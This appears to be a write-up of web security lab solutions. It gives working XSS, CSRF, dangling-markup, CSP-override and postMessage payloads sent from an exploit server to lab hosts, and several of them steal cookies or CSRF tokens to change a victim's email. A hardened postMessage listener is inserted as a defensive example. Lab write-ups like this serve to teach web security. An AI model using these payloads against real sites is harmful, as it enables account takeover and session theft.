Put this in the exploit server body and 'deliver to victim' (change the host to your lab host):
<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E" width=300 id="frame" onload="this.width = 500"></iframe>
Step 1: get the CSRF token by using the exploit server to deliver the following to the victim (replace the lab and exploit server URLs):
<script>
document.location.href="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email?email=blag%22%3E%3Ctable%20background=%27https://ace71f031efe70a080702c43015d00b1.web-security-academy.net?"
</script>
The token will show up in the logs.
Step 2: deliver the following to the victim (replace the CSRF token and the lab server URL):
<form method="post" name="evilform" action="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email/change-email">
<input type="hidden" name="csrf" value="Hd9l1m0c3zWpghPPTcP2XXqFD2wL6M2M" />
<input type="hidden" name="email" value="[email protected]" />
</form>
<script>document.forms['evilform'].submit()</script>
Set the exploit payload to the following (with the exploit server and lab hosts changed), then deliver it to the victim:
<form name="evilform" method="post" action="https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email/change-email">
<input type="hidden" id="csrf" name="csrf" value="" />
<input type="hidden" name="email" value="[email protected]" />
</form>
<script>
var token = "name=\"csrf\" value=\"";
if(name.indexOf(token) <= 0) document.location = "https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email?email=test%22%3E%3Ca%20href=%22https://ac411ff51fb79a6080a585620112003f.web-security-academy.net/exploit%22%3EClick%20me!%3C/a%3E%3Cbase%20target=%27blag";
else {
var loc = name.indexOf(token) + token.length;
var csrf = name.substring(loc);
csrf = csrf.substring(0, csrf.indexOf("\""))
document.getElementById('csrf').value = csrf;
document.forms['evilform'].submit(); }
</script>
How does it work? The script checks whether the current window's name contains a CSRF token. If not, the user is redirected to the change-email page via a reflected XSS that creates a 'Click me!' link and uses a dangling markup attack (an unclosed `<base target='...`) so that the rest of the page source, including the CSRF token, becomes the link's target window name. On clicking, the user is sent back to the exploit page, where the CSRF token is extracted from window.name and the form is submitted to change their email.
Just set the URL to: https://aca61fea1e9ec7bd80295df8004a0073.web-security-academy.net/?search=%3Cscript%3Ealert(1)%3C/script%3E&token=;%20script-src-elem%20%27unsafe-inline%27
It uses a reflected XSS vector in the search box to print a script tag containing the alert, and uses the token query string (which is reflected into the Content-Security-Policy header) to override the CSP with a script-src-elem 'unsafe-inline' directive that allows inline script tags.
Deliver this to the victim (with the server URL changed). An img tag is used because script tags inserted via innerHTML are not executed:
<iframe src="https://acb51f721fd0b337808c671c00700072.web-security-academy.net" onload="this.contentWindow.postMessage('<img src=blag onerror=alert(document.cookie) />','*')">
Deliver this (with the server URL changed). It works because the page puts the message into an href, and a javascript: URL in the href invokes JS on the current page:
<iframe src="https://ac6e1f531ec5c6f5801a86ee009d00d3.web-security-academy.net" onload="this.contentWindow.postMessage('javascript:alert(document.cookie)//http:','*')">
Deliver this to the victim. Note the use of &quot; to get quotes in the nested JavaScript. Also, with the iframe src, alert(xss) didn't work but alert(document.cookie) did, which is interesting.
<iframe src="https://ac331fd21e7b389f806fa34900380092.web-security-academy.net/" onload="this.contentWindow.postMessage('{&quot;type&quot;:&quot;load-channel&quot;,&quot;url&quot;:&quot;javascript:alert(document.cookie)&quot;}','*')" />
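The three postMessage payloads above (the innerHTML sink, the javascript: href and the JSON load-channel message) all rely on the receiving page trusting any sender and passing the message straight into a dangerous sink. The listener below is an added example of the defender's side, not code from the write-up or from the labs: it checks event.origin against an assumed TRUSTED_ORIGIN placeholder, accepts only structured JSON, rejects URL schemes other than https: (so javascript: is dropped), and renders text through textContent instead of innerHTML.

```javascript
// Hardened postMessage receiver (added example; TRUSTED_ORIGIN is an assumed placeholder).
const TRUSTED_ORIGIN = "https://trusted.example"; // assumption: the only sender we accept
const ALLOWED_SCHEMES = ["https:"];                // javascript:, data:, etc. are rejected

// Decide what to do with an incoming message. Returns an action object, or null to ignore.
// Kept as a pure function so it can be exercised without a browser.
function decideMessage(event, trustedOrigin = TRUSTED_ORIGIN) {
  // 1. Origin check: the sender's '*' target means anyone can post; the receiver must verify.
  if (event.origin !== trustedOrigin) return null;

  // 2. Only accept structured data. A raw HTML string (the innerHTML case) fails to parse.
  let msg = event.data;
  if (typeof msg === "string") {
    try { msg = JSON.parse(msg); } catch { return null; }
  }
  if (!msg || typeof msg !== "object") return null;

  // 3. Validate navigation URLs by scheme, resolving relative paths against our own origin.
  if (msg.type === "load-channel" && typeof msg.url === "string") {
    let parsed;
    try { parsed = new URL(msg.url, trustedOrigin); } catch { return null; }
    if (!ALLOWED_SCHEMES.includes(parsed.protocol)) return null;
    return { action: "navigate", url: parsed.href };
  }

  // 4. Text is returned as data; the caller must render it with textContent, never innerHTML.
  if (msg.type === "show-text" && typeof msg.text === "string") {
    return { action: "text", text: msg.text };
  }
  return null;
}

// Browser wiring; only runs where a window exists (skipped under Node).
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    const decision = decideMessage(event);
    if (!decision) return;
    if (decision.action === "navigate") location.href = decision.url;
    else document.getElementById("status").textContent = decision.text;
  });
}
```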
Deliver the following. The product page stores the current URL in a cookie, and the home page then uses that cookie value as part of innerHTML. So I create a URL for the product page that includes a quote to break out of the attribute and an XSS image tag that alerts the cookie. Worked great :)
Notably, the iframe loads the product page to set the cookie, and once it has loaded, the onload handler navigates the main page to the exploitable home page, in a two-step manipulation.
<iframe src="https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net/product?productId=1&%27%3E%3Cimg%20src=blag%20onerror=alert(document.cookie)%20/%3E" onload="document.location.href='https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net'" />
Thanks for the write-up... Just started learning about XSS not too long ago and I am confused as to why we have to use an exploit server to complete it and why it doesn't run directly through the site. Thanks in advance for your help :)